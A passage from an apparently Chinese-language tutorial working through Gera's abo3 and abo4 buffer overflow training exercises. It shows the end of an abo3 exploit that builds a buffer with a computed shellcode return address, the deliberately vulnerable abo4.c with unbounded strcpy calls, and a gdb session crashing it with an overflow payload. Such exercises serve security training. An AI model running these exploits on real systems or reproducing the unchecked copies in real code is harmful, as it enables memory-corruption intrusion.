/* Calculating address of shellcode */<br />
int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo3");<br />
<br />
/* Constructing the buffer */<br />
p = evil_buffer;<br />
memset( p,'B',256); // Some junk<br />
p += 256;<br />
<br />
*((void **)p)=(void *)(ret);<br />
p +=4;<br />
* p='0';<br />
<br />
/* Two arguments are passed to vulnerable program */<br />
execle("/home/user/gera/abo3","abo3", evil_buffer,"A",NULL,env);<br />
}<br />
<br />
<br />
<br />
高级缓存区溢出代码4的分析<br />
源代码:<br />
/* abo4.c *<br />
* specially crafted to feed your brain by gera@core-sdi.com */<br />
<br />
/* After this one, the next is just an Eureka! away */<br />
<br />
extern system, puts; /* implicit-int externs for two libc symbols; only their addresses are taken (here and in main) */<br />
void (* fn)( char*)=( void(*)( char*))& system; /* file-scope function pointer: stored at a fixed address (see the movl to 0x80495cc in the disassembly), i.e. in .data rather than on main's stack */<br />
<br />
/* Entry point of the training target. Note the swapped parameter names: `argv` is the<br />
 * argument count and `argc` the argument vector. argc[1..3] are used without checking<br />
 * the count. The body's braces are missing in this rendering. */<br />
int main( int argv, char ** argc) <br />
char * pbuf= malloc(strlen(argc[2])+1); /* no <stdlib.h> in scope, so malloc is implicitly int -- likely the line-10 warning in the build log; result is not checked */<br />
char buf[256]; /* fixed 256-byte stack buffer; per the disassembly buf is at -0x104(%ebp) and pbuf at -0x4(%ebp), so pbuf sits directly past the end of buf */<br />
<br />
fn=(void(*)(char*))& puts; /* rebinds the global pointer to puts before it is used */<br />
strcpy(buf,argc[1]); /* unbounded copy: an argument longer than 256 bytes overruns buf into the adjacent stack slot, pbuf first */<br />
strcpy(pbuf,argc[2]); /* writes through pbuf after the previous copy may have overwritten it -- the gdb run faults here with dest=0x41414141 */<br />
fn(argc[3]); /* indirect call through the .data pointer */<br />
while(1); /* never returns; keeps the process alive instead of reaching the return path */<br />
<br />
从攻击者的角度看,这个程序跟前面那个没什么不同,只是fn的地址已经不再分配在栈里了:因为它在main()函数之前声明,所以它的地址现在被分配在.data区里。<br />
<br />
user@CoreLabs:~/gera$ gcc abo4.c -o abo4 -ggdb<br />
abo4.c: In function `main':<br />
abo4.c:10: warning: initialization makes pointer from integer without a<br />
cast<br />
user@ CoreLabs:~/ gera$ gdb ./ abo4<br />
GNU gdb 5.0<br />
Copyright 2000 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you<br />
arewelcome to change it and/ or distribute copies of it under certain<br />
conditions.<br />
Type " show copying" to see the conditions.<br />
There is absolutely no warranty for GDB. Type " show warranty" for details.<br />
This GDB was configured as " i386- slackware- linux"...<br />
( gdb) r ` perl - e ' printf " A" x 260'` BBBB CCCC<br />
Starting program: / home/ user/ gera/ abo4 ` perl - e ' printf " A" x 260'` BB CC<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
strcpy ( dest= 0x41414141 < Address 0x41414141 out of bounds>, src= 0xbffffb6e<br />
" BBBB") at ../ sysdeps/ generic/ strcpy. c: 40<br />
40 ../ sysdeps/ generic/ strcpy. c: No such file or directory.<br />
( gdb) disass main<br />
Dump of assembler code for function main:<br />
0x80484d0 < main>: push % ebp<br />
0x80484d1 < main+ 1>: mov % esp,% ebp<br />
0x80484d3 < main+ 3>: sub $ 0x114,% esp<br />
0x80484d9 < main+ 9>: push % ebx<br />
0x80484da < main+ 10>: add $ 0xfffffff4,% esp<br />
0x80484dd < main+ 13>: add $ 0xfffffff4,% esp<br />
<br />
0x80484e0 < main+ 16>: mov 0xc(% ebp),% eax<br />
0x80484e3 < main+ 19>: add $ 0x8,% eax<br />
0x80484e6 < main+ 22>: mov (% eax),% edx<br />
0x80484e8 < main+ 24>: push % edx<br />
0x80484e9 < main+ 25>: call 0x80483b4 < strlen><br />
0x80484ee < main+ 30>: add $ 0x10,% esp<br />
0x80484f1 < main+ 33>: mov % eax,% eax<br />
0x80484f3 < main+ 35>: lea 0x1(% eax),% edx<br />
0x80484f6 < main+ 38>: push % edx<br />
0x80484f7 < main+ 39>: call 0x8048394 < malloc><br />
0x80484fc < main+ 44>: add $ 0x10,% esp<br />
0x80484ff < main+ 47>: mov % eax,% eax<br />
0x8048501 < main+ 49>: mov % eax, 0xfffffffc(% ebp)<br />
0x8048504 < main+ 52>: movl $ 0x8048384,0x80495cc<br />
0x804850e < main+ 62>: add $ 0xfffffff8,% esp<br />
0x8048511 < main+ 65>: mov 0xc(% ebp),% eax<br />
0x8048514 < main+ 68>: add $ 0x4,% eax<br />
0x8048517 < main+ 71>: mov (% eax),% edx<br />
0x8048519 < main+ 73>: push % edx<br />
0x804851a < main+ 74>: lea 0xfffffefc(% ebp),% eax<br />
0x8048520 < main+ 80>: push % eax<br />
0x8048521 < main+ 81>: call 0x80483d4 < strcpy><br />
0x8048526 < main+ 86>: add $ 0x10,% esp<br />
0x8048529 < main+ 89>: add $ 0xfffffff8,% esp<br />
0x804852c < main+ 92>: mov 0xc(% ebp),% eax<br />
0x804852f < main+ 95>: add $ 0x8,% eax<br />
0x8048532 < main+ 98>: mov (% eax),% edx<br />
0x8048534 < main+ 100>: push % edx<br />
0x8048535 < main+ 101>: mov 0xfffffffc(% ebp),% eax<br />
0x8048538 < main+ 104>: push % eax<br />
0x8048539 < main+ 105>: call 0x80483d4 < strcpy><br />
0x804853e < main+ 110>: add $ 0x10,% esp<br />
0x8048541 < main+ 113>: add $ 0xfffffff4,% esp<br />
0x8048544 < main+ 116>: mov 0xc(% ebp),% eax<br />
0x8048547 < main+ 119>: add $ 0xc,% eax<br />
0x804854a < main+ 122>: mov (% eax),% edx<br />
0x804854c < main+ 124>: push % edx<br />
0x804854d < main+ 125>: mov 0x80495cc,% ebx<br />
0x8048553 < main+ 131>: call *% ebx<br />
0x8048555 < main+ 133>: add $ 0x10,% esp<br />
0x8048558 < main+ 136>: jmp 0x8048560 < main+ 144><br />
0x804855a < main+ 138>: jmp 0x8048562 < main+ 146><br />
0x804855c < main+ 140>: lea 0x0(% esi, 1),% esi<br />
0x8048560 < main+ 144>: jmp 0x8048558 < main+ 136><br />
0x8048562 < main+ 146>: mov 0xfffffee8(% ebp),% ebx<br />
0x8048568 < main+ 152>: leave<br />
0x8048569 < main+ 153>: ret<br />
End of assembler dump.<br />
( gdb) main inf sec<br />
Exec file: `/ home/ user/ gera/ abo4', file type elf32- i386.<br />
[Some part of output was removed. It's not needed anyway]<br />